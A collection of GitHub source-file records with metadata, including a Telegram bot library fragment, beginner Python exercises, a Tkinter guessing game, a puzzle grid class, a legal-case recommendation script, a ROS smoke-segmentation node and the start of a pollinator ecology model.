helper.ListItem() # text\n AUDIO = helper.ListItem() # audio\n DOCUMENT = helper.ListItem() # document\n ANIMATION = helper.ListItem() # animation\n GAME = helper.ListItem() # game\n PHOTO = helper.ListItem() # photo\n STICKER = helper.ListItem() # sticker\n VIDEO = helper.ListItem() # video\n VIDEO_NOTE = helper.ListItem() # video_note\n VOICE = helper.ListItem() # voice\n CONTACT = helper.ListItem() # contact\n LOCATION = helper.ListItem() # location\n VENUE = helper.ListItem() # venue\n NEW_CHAT_MEMBERS = helper.ListItem() # new_chat_member\n LEFT_CHAT_MEMBER = helper.ListItem() # left_chat_member\n INVOICE = helper.ListItem() # invoice\n SUCCESSFUL_PAYMENT = helper.ListItem() # successful_payment\n CONNECTED_WEBSITE = helper.ListItem() # connected_website\n MIGRATE_TO_CHAT_ID = helper.ListItem() # migrate_to_chat_id\n MIGRATE_FROM_CHAT_ID = helper.ListItem() # migrate_from_chat_id\n PINNED_MESSAGE = helper.ListItem() # pinned_message\n NEW_CHAT_TITLE = helper.ListItem() # new_chat_title\n NEW_CHAT_PHOTO = helper.ListItem() # new_chat_photo\n DELETE_CHAT_PHOTO = helper.ListItem() # delete_chat_photo\n GROUP_CHAT_CREATED = helper.ListItem() # group_chat_created\n PASSPORT_DATA = helper.ListItem() # passport_data\n\n UNKNOWN = helper.ListItem() # unknown\n ANY = helper.ListItem() # any\n\n\nclass ParseMode(helper.Helper):\n \"\"\"\n Parse modes\n\n :key: MARKDOWN\n :key: HTML\n \"\"\"\n\n mode = helper.HelperMode.lowercase\n\n MARKDOWN = helper.Item()\n HTML = helper.Item()\n","repo_name":"MohammadKakuei/articlebot","sub_path":"Lib/site-packages/aiogram/types/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":37411,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72207043026","text":"import sys\n\nN = int(sys.stdin.readline())\nplan = sys.stdin.readline().split()\npos = (1, 1)\n\n\ndef move(drct, pos):\n if drct == 'U' and pos[0] != 1:\n return pos[0] - 1, pos[1]\n elif drct == 'D' and pos[0] != N:\n return pos[0] + 1, pos[1]\n elif drct == 'R' and pos[1] != N:\n return pos[0], pos[1] + 1\n elif drct == 'L' and pos[1] != 1:\n return pos[0], pos[1] - 1\n else:\n return pos\n\n\nfor i in range(len(plan)):\n pos = move(plan[i], pos)\n\nprint(*pos)","repo_name":"camp5803/data_structure_c_py","sub_path":"algorithms/ict_3_3.py","file_name":"ict_3_3.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71397949587","text":"import tkinter as tk #Importing the Tkinter package.\r\nfrom tkinter import * #Importing everything from Tkinter library.\r\nimport random #Importing random module to take Random values.\r\n\r\nglobal no #Declaring global variables.\r\nglobal score #Declaring global variables.\r\nroot = Tk()\r\nroot.title(\"Guess Game\") #The title of the game window\r\nroot.geometry('600x400') #The size of the game window\r\nroot.configure(bg=\"light green\") #The color of the background in the game window.\r\nno = random.randint(1, 100) #Storing any random number between 1-100 in \"no\" variable\r\nscore = 0 #Variable to keep track of the player score\r\nchoice = IntVar() #Value holder for integer variable. The value stored by the user is stored in this.\r\n\r\n\r\ndef comp(): #Is a function which is used to compare the player's input and the computers number\r\n global score #It also increments the score variable after every attempt by the player\r\n if no < choice.get():\r\n Label1 = Label(root, text=\" Guess a lower Number \", #Label used to give the player a hint.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label1.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n score += 1\r\n\r\n elif no > choice.get():\r\n Label2 = Label(root, text=\" Guess a Higher Number\", #Label used to give the player a hint.\r\n relief=RIDGE, font=('Roboto', 15), )\r\n Label2.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n score += 1\r\n else:\r\n Label3 = Label(root, text=\"Damn🔥🔥.Right Answer!!\", #Label used to print if the player got the right answer.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label3.place(relx=0.5, rely=0.6, anchor=CENTER)\r\n Label5 = Label(root, text=score,\r\n relief=RIDGE, font=('Roboto', 15)) #Label used to print the final score of the player.\r\n Label5.place(relx=0.57, rely=0.5, anchor=CENTER)\r\n\r\n\r\ndef resart(): #Function used to restart the game/start a new game with new score.\r\n global no\r\n global score\r\n no = random.randint(1, 100) #Changing the computer's number by selecting any random number between 1-100.\r\n score = 0 #Resetting the score to zero.\r\n Label6 = Label(root, text=score,#Printing the score back to 0.\r\n relief=RIDGE, font=('Roboto', 15))\r\n Label6.place(relx=0.55, rely=0.5, anchor=CENTER)\r\n return\r\n\r\n\r\nLabelhead = Label(root, text=\"Enter any Number between 1 to 100 \", #Instruction for the player.\r\n relief=RIDGE, font=('Roboto', 20))\r\nLabelhead.place(relx=0.5, rely=0.05, anchor=CENTER)\r\n\r\nLabel4 = Label(root, text=\"Score = \", #\"Score =\" being printed in the window.\r\n relief=RIDGE, font=('Roboto', 15))\r\nLabel4.place(relx=0.5, rely=0.5, anchor=CENTER)\r\n\r\nent1 = Entry(root, textvariable=choice, width=3, #Entry box where the user inputs his/her guess.\r\n font=('Roboto', 50), relief=GROOVE)\r\nent1.place(relx=0.5, rely=0.275, anchor=CENTER)\r\n\r\nmyButton1 = Button(root, text=\"GUESS\", padx=35, pady=15, command=comp) #Button which calls the \"comp()\" function.\r\nmyButton1.place(relx=0.5, rely=0.8, anchor=CENTER)\r\n\r\nmyButton2 = Button(root, text=\"Quit\", padx=45, #Button which terminates the window.\r\n pady=15, command=root.destroy)\r\nmyButton2.place(relx=0.75, rely=0.8, anchor=CENTER)\r\n\r\nmyButton3 = Button(root, text=\"Play Again\", padx=35, #Button which calls the \"restart()\" function.\r\n pady=15, command=resart)\r\nmyButton3.place(relx=0.25, rely=0.8, anchor=CENTER)\r\n\r\nroot.mainloop() #Calling the mainloop of Tk\r\n\r\n#Coded by Aman Rehan, 12001782","repo_name":"Gauravsingh23/Mini-Games","sub_path":"Guess.py","file_name":"Guess.py","file_ext":"py","file_size_in_byte":4047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71250863506","text":"from constants import *\nfrom grid import Grid\n\nclass LineGrid(Grid):\n def __init__(self, data_string):\n Grid.__init__(self, data_string)\n self.precalc_given_adjacencies()\n self.precalc_junctions()\n self.precalc_junction_adjacencies()\n\n def precalc_given_adjacencies(self):\n self.given_adjacencies = {}\n for pos in self.givens.keys():\n self.given_adjacencies[pos] = self._given_adjacencies(pos)\n\n def _adjacencies(self, pos):\n x, y = pos\n adjacencies = [\n (x-1, y-1),\n (x-1, y+1),\n (x+1, y-1),\n (x+1, y+1),\n ]\n if LineGrid.is_vertical(pos):\n adjacencies.extend([\n (x, y-2),\n (x, y+2),\n ])\n else: # horizontal\n adjacencies.extend([\n (x-2, y),\n (x+2, y),\n ])\n return self.cull_bounds(adjacencies)\n\n def _given_adjacencies(self, given_pos):\n x, y = given_pos\n x = x * 2 + 1\n y = y * 2 + 1\n return self.cull_bounds([(x-1, y),\n (x+1, y),\n (x, y-1),\n (x, y+1)])\n\n NODE_CHAR = '+'\n VERTICAL_CHAR = '|'\n HORIZONTAL_CHAR = '-'\n UNKNOWN_CHAR = ' '\n\n def translate_data(self, data_dict):\n self.data = {} # lines data\n self.givens = {}\n self.junction_givens = {}\n data_values = data_dict.values()\n if (LineGrid.NODE_CHAR not in data_values and\n LineGrid.VERTICAL_CHAR not in data_values):\n self.translate_data_compact(data_dict)\n return\n # full representation with nodes and lines\n assert self.x_size % 2 == 1\n assert self.y_size % 2 == 1\n self.x_size = (self.x_size - 1) // 2\n self.y_size = (self.y_size - 1) // 2\n for pos in self.iter_checker():\n c = data_dict.get(pos)\n if c == LineGrid.VERTICAL_CHAR or c == LineGrid.HORIZONTAL_CHAR:\n self.data[pos] = BLACK\n elif c == self.CHARS[WHITE]:\n self.data[pos] = WHITE\n else:\n self.data[pos] = UNKNOWN\n # space givens\n for x in range(self.x_size):\n for y in range(self.y_size):\n pos = x, y\n x = x * 2 + 1\n y = y * 2 + 1\n c = data_dict.get((x, y))\n num = self.RCHARS.get(c)\n if num in GIVENS:\n self.givens[pos] = num\n # junction givens\n for jx in range(self.x_size + 1):\n for jy in range(self.y_size + 1):\n pos = jx * 2, jy * 2\n c = data_dict.get(pos)\n if c is not None and c != LineGrid.NODE_CHAR:\n self.junction_givens[(jx, jy)] = c\n\n def translate_data_compact(self, data_dict):\n for pos, value in data_dict.items():\n c = data_dict.get(pos)\n num = self.RCHARS.get(c)\n if num in GIVENS:\n self.givens[pos] = num\n for x, y in self.iter_checker():\n self.data[(x, y)] = UNKNOWN\n\n def __repr__(self):\n display_x_size = (self.x_size) * 2 + 1\n display_y_size = (self.y_size) * 2 + 1\n char_grid = [[' '] * display_x_size for i in range(display_y_size)]\n # place nodes\n for x in range(self.x_size + 1):\n for y in range(self.y_size + 1):\n char = self.junction_givens.get((x, y))\n if char is None:\n char = LineGrid.NODE_CHAR\n char_grid[y * 2][x * 2] = char\n # show given numbers\n for key, value in self.givens.iteritems():\n x, y = key\n x = x * 2 + 1\n y = y * 2 + 1\n char_grid[y][x] = self.CHARS[value]\n # show lines\n for pos, color in self.data.items():\n x, y = pos\n if color == WHITE:\n char_grid[y][x] = self.CHARS[WHITE]\n elif color == BLACK:\n if LineGrid.is_vertical(pos):\n char_grid[y][x] = LineGrid.VERTICAL_CHAR\n else:\n char_grid[y][x] = LineGrid.HORIZONTAL_CHAR\n return '\\n'.join(''.join(line) for line in char_grid)\n\n def is_vertical(position):\n x, y = position\n assert((x + y) % 2 == 1)\n return x % 2 == 0\n is_vertical = staticmethod(is_vertical)\n\n def iter_checker(self):\n for x in range(self.x_size * 2 + 1):\n for y in range(self.y_size * 2 + 1):\n if (x + y) % 2 == 1: # odd checkerboard pattern\n yield (x, y)\n\n def adjacent_givens(self, position):\n x, y = position\n if LineGrid.is_vertical(position):\n givens = [(x-1, y), (x+1, y)]\n else: # horizontal\n givens = [(x, y-1), (x, y+1)]\n givens = [((gx - 1) // 2, (gy - 1) // 2) for gx, gy in givens]\n return self.cull_bounds_givens(givens)\n\n def precalc_junctions(self):\n self.junctions = []\n for x in range(self.x_size + 1):\n for y in range(self.y_size + 1):\n self.junctions.append((x, y))\n\n def precalc_junction_adjacencies(self):\n self.junction_adjacencies = {}\n for jpos in self.junctions:\n self.junction_adjacencies[jpos] = self._junction_adjacencies(jpos)\n \n def _junction_adjacencies(self, pos):\n x, y = pos\n x = x * 2\n y = y * 2\n return self.cull_bounds([(x-1, y),\n (x+1, y),\n (x, y-1),\n (x, y+1)])\n\n def cull_bounds_givens(self, position_list):\n return [pos for pos in position_list if pos in self.givens.keys()]\n\n\n","repo_name":"christian-oudard/logic-puzzle-toolkit","sub_path":"linegrid.py","file_name":"linegrid.py","file_ext":"py","file_size_in_byte":5871,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"42113376865","text":"from collections import deque\r\n\r\nquantity_liters = int(input())\r\n\r\npeople = deque()\r\n\r\nwhile True:\r\n command = input()\r\n if command == 'Start':\r\n break\r\n else:\r\n name = command\r\n people.append(name)\r\n\r\n\r\nwhile True:\r\n command = input()\r\n if command.isdigit():\r\n litters_to_drink = int(command)\r\n person = people.popleft()\r\n if litters_to_drink <= quantity_liters:\r\n quantity_liters -= litters_to_drink\r\n print(f'{person} got water')\r\n else:\r\n print(f'{person} must wait')\r\n elif command.startswith(\"refill \"):\r\n liters_to_add = int(command.split(' ')[-1])\r\n quantity_liters += liters_to_add\r\n elif command == 'End':\r\n break\r\n\r\nprint(f'{quantity_liters} liters left')","repo_name":"AlexanderIvanofff/Python-OOP","sub_path":"List as Stacks and Queues/water_dispenser.py","file_name":"water_dispenser.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12423881767","text":"def solution(answers):\n cnt = [0] * 3\n p = [[0] * len(answers) for _ in range(3)]\n ar2 = [1, 3, 4, 5]\n ar3 = [3, 1, 2, 4, 5]\n for i in range(len(answers)):\n p[0][i] = (i + 1) % 5 if (i + 1) % 5 else 5\n p[1][i] = ar2[(int)(i / 2) % 4] if i % 2 else 2\n p[2][i] = ar3[(int)(i / 2) % 5]\n for j in range(3):\n if p[j][i] == answers[i]:\n cnt[j] += 1\n m = max(cnt)\n answer = [i + 1 for i, v in enumerate(cnt) if v == m]\n return answer\n\nanswers = [1, 3, 2, 4, 2]\nprint(solution(answers))\n","repo_name":"raonsol/ps","sub_path":"programmers/brute_force/moak_exam.py","file_name":"moak_exam.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"40827761241","text":"import argparse\nimport json\nimport os\nimport threading\n\nimport pandas as pd\n\nfrom OpenHINE.train import model_main\nfrom execute_graph_query import SPARQLquery\nfrom process_input_caseid import process_id\nfrom recommend import recommend\n\nBASE_PATH = '/Users/xinyu/Documents/Dissertation/LegalWeb'\nEMBEDDING_PATH = BASE_PATH + \"/OpenHINE/output/embedding/MetaGraph2vec/test_node.txt\"\n\n\ndef init_para():\n parser = argparse.ArgumentParser(description=\"LegalWeb\")\n parser.add_argument('-i', '--input', default='2021_IEHC_683', type=str, help=\"Input content\")\n case_args = parser.parse_args()\n return case_args\n\n\nif __name__ == '__main__':\n args = init_para()\n # check if the new input in database. If exist: directly recommend; else process and train\n sql = SPARQLquery(\"http://localhost:7200/repositories/LegalWeb\")\n\n # query_neutral = args.input\n query_neutral = '2020_IECA_184'\n\n # not exist: 2020_IECA_183 ;\n # exist: 2020_IECA_159 (topic 6)/2022_IEHC_141 (topic 4);\n # 2022_IEHC_393 (topic 3) / 2022_IEHC_83 (topic 2)\n # 2022_IEHC_167 (topic 5)\n # 2020_IECA_184 (topic 8)/2021_IECA_1 (topic 10);\n # 2021_IECA_322 (topic 1); 2021_IECA_248 (topic 9)\n # 2021_IEHC_773 (topic 7)\n query_case = sql.query_case_exist(query_neutral)\n if query_case:\n print('Case exist', query_case)\n else:\n print('Case not exist')\n\n print('--- Start processing ---')\n query_case, dic_results, nlp_results = process_id(query_neutral)\n print(\"case id:\", query_case)\n print(\"dic results:\", dic_results)\n print(\"nlp results:\", nlp_results)\n print('--- End processing ---\\n\\n')\n\n print('--- Start inserting ---')\n sql_ = SPARQLquery(\"http://localhost:7200/repositories/LegalWeb/statements\")\n r = sql_.insert_new_case_info(dic_results)\n # r = sql_.delete_new_case_info(dic_results)\n print(r)\n print('--- End inserting ---\\n\\n')\n\n print('--- Start Training ---')\n os.system(\"python OpenHINE/train.py -m MetaGraph2vec -d test\")\n t = threading.Thread(target=model_main)\n t.start()\n t.join()\n print('--- End Training ---\\n\\n')\n\n print(\"--- Start recommending ---\")\n with open(EMBEDDING_PATH, mode='r', encoding='utf-8') as f:\n line = f.readlines()\n try:\n if len(line[0].split(\" \")) == 2:\n line = line[1:]\n f = open(EMBEDDING_PATH , mode='w', encoding='utf-8')\n f.writelines(line)\n f.close()\n except Exception as e:\n print(e)\n embedding = pd.read_table(EMBEDDING_PATH, names=list(range(0, 65, 1)), sep=' ')\n recommendation, evaluation = recommend(embedding, query_case)\n print(recommendation)\n print(evaluation)\n if recommendation:\n info = sql.query_recommendation(recommendation)\n with open(BASE_PATH + \"/recommendation.json\", \"w\") as write_file:\n json.dump(info, write_file, indent=4)\n print('--- End recommending ---\\n\\n')\n","repo_name":"kongkongYuki/YuXin","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32949224823","text":"#!/usr/local/bin/python3.10 \n# license removed for brevity\n\nfrom operator import truediv\nfrom re import sub\nimport rospy\nfrom rospy.client import init_node\nfrom sensor_msgs.msg import Image\nfrom vision_msgs.msg import Detection2D\nfrom sensor_msgs.msg import TimeReference\nfrom std_msgs.msg import String\nimport numpy as np\nimport cv2\nimport os, re\n# import PySpin\nimport sys, datetime\nimport argparse\nfrom pathlib import Path\nimport time\nimport torch\nfrom scipy.stats import linregress\n\nfrom ultralytics import YOLO\n\nprint(f\"Torch setup complete. Using torch {torch.__version__} ({torch.cuda.get_device_properties(0).name if torch.cuda.is_available() else 'CPU'})\")\n\n\n#global publisher and boundingbox\nglobal pub, box, video, timelog\n\n#global initialized variables for segmentation model\nglobal imgsz, model, device, names, max_det, max_delay\n#global engine, half\n\n\n#------------------------OPTIONS---------------------#\nmax_delay = 0.5 # [seconds] delay between last detection and current image after which to just drop images to catch up\n\nconf_thres=0.25 # originally 0.4 # confidence threshold\niou_thres=0.45 # NMS IOU threshold\nmax_det=100 # maximum detections per image\nimgsz = (352,448) # previously [352,448] # scaled image size to run inference on #inference size (height, width) \ndevice='cpu' # device='cuda:0'\nretina_masks=True\n\nsave_txt = False\nsave_img = False \nsave_crop = False \nview_img = True\nhide_labels=False, # hide labels\nhide_conf=False, # hide confidences\nVIEW_IMG=True\nVIEW_MASK=False\nSAVE_IMG = False\nsave_format = False #'.avi' or '.raw'\n#-----------------------------------------------------#\n\n\ngps_t = 0\n# create saving directory\n# username = os.getlogin( )\ntmp = datetime.datetime.now()\nstamp = (\"%02d-%02d-%02d\" % \n (tmp.year, tmp.month, tmp.day))\nmaindir = Path('./SavedData')\nruns_today = list(maindir.glob('*%s*_segmentation' % stamp))\nif runs_today:\n runs_today = [str(name) for name in runs_today]\n regex = 'run\\d\\d'\n runs_today=re.findall(regex,''.join(runs_today))\n runs_today = np.array([int(name[-2:]) for name in runs_today])\n new_run_num = max(runs_today)+1\nelse:\n new_run_num = 1\nsavedir = maindir.joinpath('%s_run%02d_segmentation' % (stamp,new_run_num))\nos.makedirs(savedir) \n\n\n# YOLO paths and importing\nFILE = Path(__file__).resolve()\nYOLOv5_ROOT = FILE.parents[1] / 'scripts/modules/yolov8-seg/yolo-V8' # YOLOv5 root directory\nif str(YOLOv5_ROOT) not in sys.path:\n sys.path.append(str(YOLOv5_ROOT)) # add YOLOv5_ROOT to PATH\n# print(YOLOv5_ROOT)\nYOLOv5_ROOT = Path(os.path.relpath(YOLOv5_ROOT, Path.cwd())) # relative\n\n\n# labeling text on image\nBLACK = (265,265,265)\nfont = cv2.FONT_HERSHEY_SIMPLEX\nfont_size = 1\nfont_color = BLACK\nfont_thickness = 2\n\n\n\ndef imagecallback(img):\n global pub,box,video,timelog\n global imgsz, model, device, names\n box = Detection2D()\n\n # converting image to numpy array\n img_numpy = np.frombuffer(img.data,dtype=np.uint8).reshape(img.height,img.width,-1)\n\n if rospy.Time.now() - img.header.stamp > rospy.Duration(max_delay):\n #print(\"DetectionNode: dropping old image from detection\\n\")\n return\n else:\n results = model.predict(img_numpy, conf=conf_thres, imgsz=imgsz, iou=iou_thres, max_det=max_det, verbose=False)\n\n if results[0].masks != None:\n\n resize_orig_img = cv2.resize(results[0].orig_img, (len(results[0].masks.data[0][0]), len(results[0].masks.data[0]))) # resizing the original image to the size of mask \n #cv2.imshow('Original Image', resize_orig_img)\n #cv2.waitKey(1)\n #print(f'Resize Image Shape: {resize_orig_img.shape}')\n #print(f'Resize Image: {resize_orig_img}')\n #blk = np.zeros(img_numpy.shape)\n\n max_white_pixels, data_idx = 0, 0\n x_mean, y_mean = -1, -1\n for i in range(len(results[0].masks.data)):\n indices = find_element_indices(results[0].masks.data[0].cpu().numpy(), 1) # pixels belonging to a segmented image is having corresponding value of 1\n white_x_mean, white_y_mean, white_pixel_indices = check_white_pixels(indices, resize_orig_img)\n white_pixel_count = len(white_pixel_indices)\n if max_white_pixels <= white_pixel_count:\n max_white_pixels = white_pixel_count\n data_idx = i\n x_mean, y_mean = white_x_mean, white_y_mean\n \n if x_mean == -1 and y_mean == -1:\n box.bbox.center.x = -1\n box.bbox.center.y = -1\n box.bbox.center.theta = -1\n box.bbox.size_x = -1\n box.bbox.size_y = -1\n pub.publish(box)\n else:\n #print(f'Data List length: ({len(results[0].masks.data[0])}, {len(results[0].masks.data[0][0])})')\n #print(f'Masked Pixels: {mask_count}')\n #white_x_mean, white_y_mean, white_pixel_indices = check_white_pixels(indices, resize_orig_img)\n #print(f'Data List : {find_element_indices(results[0].masks.data[0].cpu().numpy(), 1)}')\n #print(f'Max data Length: {max_mask}')\n #print(f'Data idx: {data_idx}')\n #print(len(indices))\n\n img_mask = results[0].masks.data[data_idx].cpu().numpy()\n img_mask = (img_mask * 255).astype(\"uint8\")\n indices = find_element_indices(img_mask, 255)\n img_mask = cv2.cvtColor(img_mask, cv2.COLOR_GRAY2BGR)\n '''\n x_cord_sum, y_cord_sum = 0, 0\n len_indices = len(indices)\n for i in range(len_indices):\n x_cord_sum = x_cord_sum + indices[i][0]\n y_cord_sum = y_cord_sum + indices[i][1]\n x_mean = int(x_cord_sum / len_indices)\n y_mean = int(y_cord_sum / len_indices)\n '''\n x_mean_norm = x_mean / img_mask.shape[0]\n y_mean_norm = y_mean / img_mask.shape[1]\n #print(img.shape)\n #print(x_mean, y_mean)\n #print(results[0].masks.data[0])\n #print(indices)\n #python_indices = [index for (index, item) in enumerate(programming_languages) if item == \"Python\"]\n if VIEW_MASK:\n img_mask = cv2.circle(img_mask, (y_mean, x_mean), 5, (0, 0, 255), -1)\n cv2.imshow('Mask', img_mask)\n cv2.waitKey(1)\n\n #print(img_numpy.shape)\n #cor_x = (results[0].masks.xy[0][:,0] * (img_numpy.shape[1])).astype(\"int\")\n #cor_x = (results[0].masks.xy[0][:,0]).astype(\"int\")\n #cor_y = (results[0].masks.xy[0][:,1]).astype(\"int\")\n #print(cor_x)\n #blk[cor_y,cor_x] = 255\n\n #wind_h, wind_w = 960, 540\n #cv2.namedWindow('Outline', cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO)\n #cv2.resizeWindow('Outline', wind_h, wind_w)\n #cv2.imshow('Outline', blk)\n #cv2.waitKey(1)\n \n annotated_frame = results[0].plot() # result is a in which the first element is\n #print(f'Annotataed array: {annotated_frame.shape}')\n #print(f'Index Length: {len(find_pixel_indices(img_mask, [0, 0, 0]))}')\n x_mean = int(x_mean_norm * annotated_frame.shape[0])\n y_mean = int(y_mean_norm * annotated_frame.shape[1])\n annotated_frame = cv2.circle(annotated_frame, (y_mean, x_mean), 10, (255, 0, 0), -1)\n \n if VIEW_IMG:\n wind_h, wind_w = 960, 540\n cv2.namedWindow('Segmentation V8', cv2.WINDOW_NORMAL | cv2.WINDOW_KEEPRATIO) # allow window resize (Linux)\n cv2.resizeWindow('Segmentation V8', wind_h, wind_w)\n cv2.imshow('Segmentation V8', annotated_frame)\n cv2.waitKey(1)\n\n box.header.seq = img.header.seq\n box.header.stamp = img.header.stamp\n box.header.frame_id = ''\n box.source_img = img\n\n box.bbox.center.x = y_mean_norm #object[0].bounding_box[0]\n box.bbox.center.y = x_mean_norm #object[0].bounding_box[1]\n box.bbox.center.theta = 0\n #box.bbox.size_x = object[0].bounding_box[2]\n #box.bbox.size_y = object[0].bounding_box[3]\n #print(f'box.bbox.center.x: {box.bbox.center.x} | box.bbox.center.y: {box.bbox.center.y}')\n pub.publish(box)\n\n text_to_image = 'processed'\n # print('Time after running detection')\n # print('Image %d' % box.source_img.header.seq)\n # print(box.source_img.header.stamp)\n \n # end = time.time()\n # print(\"finished callback for image\", img.header.seq,\"in\",end-start, \"seconds \\n\")\n img_numpy = cv2.putText(img_numpy,text_to_image,(10,30),font, font_size, font_color, font_thickness, cv2.LINE_AA)\n\n # adding to time stamp log, every frame\n timelog.write('%d,%f,%f,%f,%f\\n' % (img.header.seq,\n float(img.header.stamp.to_sec()),\n gps_t,\n box.bbox.center.x,\n box.bbox.center.y\n ))\n \n else:\n # print(\"everything -1\")\n box.bbox.center.x = -1\n box.bbox.center.y = -1\n box.bbox.center.theta = -1\n box.bbox.size_x = -1\n box.bbox.size_y = -1\n pub.publish(box)\n\n # viewing/saving images\n savenum=img.header.seq\n\n if SAVE_IMG:\n if save_format=='.raw':\n fid = open(savedir.joinpath('Detection-%06.0f.raw' % savenum),'wb')\n fid.write(img_numpy.flatten())\n fid.close()\n elif save_format == '.avi':\n video.write(img_numpy)\n else:\n cv2.imwrite(str(savedir.joinpath('Detection-%06.0f.jpg' % savenum),img_numpy))\n \n \n\ndef init_detection_node():\n global pub, box, video, timelog\n pub = rospy.Publisher('/segmentation_box', Detection2D, queue_size=1)\n box = Detection2D()\n\n global imgsz, model, device\n \n print('Initializing YOLOv8 segmentation model')\n model= YOLO(YOLOv5_ROOT / 'yolov8-best.pt')\n\n # initializing video file\n if save_format=='.avi':\n codec = cv2.VideoWriter_fourcc('M','J','P','G')\n video = cv2.VideoWriter(str(savedir.joinpath('Detection'+save_format)),\n fourcc=codec,\n fps=20,\n frameSize = (640,480)) # this size is specific to GoPro\n\n # initializing timelog\n timelog = open(savedir.joinpath('Metadata.csv'),'w')\n timelog.write('FrameID,Timestamp_Jetson,Timestamp_GPS,Centroid_x,Centroid_y,Width,Height\\n')\n\n # initializing node\n rospy.init_node('segment_smoke', anonymous=False)\n rospy.Subscriber('front_centre_cam', Image, imagecallback)\n \n rospy.spin()\n\n\n\ndef find_element_indices(arr, target_element=1):\n indices = []\n for row_index, row in enumerate(arr):\n for col_index, element in enumerate(row):\n if element == target_element:\n indices.append((row_index, col_index))\n\n return indices\n\n\n\ndef find_pixel_indices(arr, target_pixel = [0, 0, 0]):\n indices = []\n for row_index, row in enumerate(arr):\n for col_index, element in enumerate(row):\n if (element[0] == target_pixel[0] and element[1] == target_pixel[1] and element[2] == target_pixel[2]):\n indices.append((row_index, col_index))\n\n return indices\n\n\n\ndef check_white_pixels(mask_indices, img):\n threshold = 190 # white smoke\n #cv2.imshow('Original Image', img)\n #cv2.waitKey(1)\n #print(f'Indices:{mask_indices}')\n white_pixel_indices = []\n for idx in mask_indices:\n if (img[idx][0] > threshold) and (img[idx][1] > threshold) and (img[idx][0] > threshold):\n img[idx][0], img[idx][1], img[idx][0] = 0, 0, 0\n white_pixel_indices.append(idx)\n\n x_cord_sum, y_cord_sum = 0, 0\n x, y= [], []\n num_white_pixels = len(white_pixel_indices)\n for i in range(num_white_pixels):\n x_cord_sum = x_cord_sum + white_pixel_indices[i][0]\n x.append(white_pixel_indices[i][0])\n y_cord_sum = y_cord_sum + white_pixel_indices[i][1]\n y.append(white_pixel_indices[i][1])\n\n\n if num_white_pixels != 0:\n x_mean = int(x_cord_sum / num_white_pixels)\n y_mean = int(y_cord_sum / num_white_pixels)\n x_arr, y_arr = np.array(x), np.array(y)\n slope, intercept, r_value, p_value, std_err = linregress(x_arr, y_arr)\n theta = np.degrees(np.arctan(slope))\n print(f'Len of mask_indices: {len(mask_indices)}, Len of white_pixel_indices: {len(white_pixel_indices)}, linear regression: {theta}, {intercept}, {r_value}, {p_value}, {std_err}', end='\\r')\n '''\n start_x, start_y= int(y_mean - 100 * np.cos(theta)), int(x_mean - 100 * np.sin(theta))\n end_x, end_y = int(y_mean + 100 * np.cos(theta)), int(x_mean + 100 * np.sin(theta))\n if start_x > end_x and start_y > end_y:\n new_start_x, new_start_y = end_x, end_y\n end_x, end_y = start_x, start_y\n start_x, start_y = new_start_x, new_start_y\n\n img = cv2.line(img, (start_x, start_y), (end_x, end_y), (0, 255, 0), 3)\n '''\n img = cv2.circle(img, (y_mean, x_mean), 3, (255, 0, 0), -1)\n else:\n x_mean = -1\n y_mean = -1\n\n \n\n cv2.imshow('Processed Image', img)\n cv2.waitKey(1)\n\n if len(white_pixel_indices) != 0:\n return x_mean, y_mean, white_pixel_indices\n else:\n return -1, -1, white_pixel_indices\n\n\n\n\nif __name__ == '__main__':\n try:\n init_detection_node()\n except rospy.ROSInterruptException:\n pass","repo_name":"srijanpal07/AutonomousDIHDrone_v2","sub_path":"scripts/segment_v8_test.py","file_name":"segment_v8_test.py","file_ext":"py","file_size_in_byte":14282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33219881782","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# ----------------------------------------------------------------------------\n# Created By: Sjoerd Terpstra\n# Created Date: 08/04/2022\n# ---------------------------------------------------------------------------\n\"\"\" valdovinos.py\n\nImplementation of Valdovinos model (Valdovinos et al. 2013)\n\n\"\"\"\n# ---------------------------------------------------------------------------\nimport copy\nfrom timeit import default_timer as timer\n\nimport numpy as np\n\nfrom pollcomm.ode_solver import solve_ode\nfrom pollcomm.pollcomm_class import PollcommBase\n\n__all__ = [\"ValdovinosModel\"]\n\n\ndef uniform_var(rng, mean, var, size=None):\n low = mean - mean * var\n high = mean + mean * var\n return rng.uniform(low, high, size)\n\n\nclass ValdovinosModel(PollcommBase):\n def __init__(\n self, N_p, N_a, mu=0, connectance=0.15, forbidden=0.3, nestedness=0.3,\n network_type=\"nested\", rng=None, seed=None\n ):\n super().__init__(\n N_p, N_a, mu, connectance, forbidden, nestedness, network_type, rng, seed\n )\n\n # create initial alpha by normalizing network\n self.alpha0 = self.network / self.network.sum(axis=0)\n\n self.p_var = 0.1 # parameter variance for plants\n self.a_var = 0.0001 # parameter variance for pollinators\n\n # fixed parameters\n self.tau = uniform_var(self.rng, 1, self.a_var, size=(self.N_p, self.N_a))\n self.e = uniform_var(self.rng, 0.8, self.p_var, size=(self.N_p, self.N_a))\n self.mu_p = uniform_var(self.rng, 0.002, self.p_var, size=self.N_p)\n self.mu_a = uniform_var(self.rng, 0.01, self.a_var, size=self.N_a)\n self.c = uniform_var(self.rng, 0.2, self.a_var, size=(self.N_p, self.N_a))\n self.b = 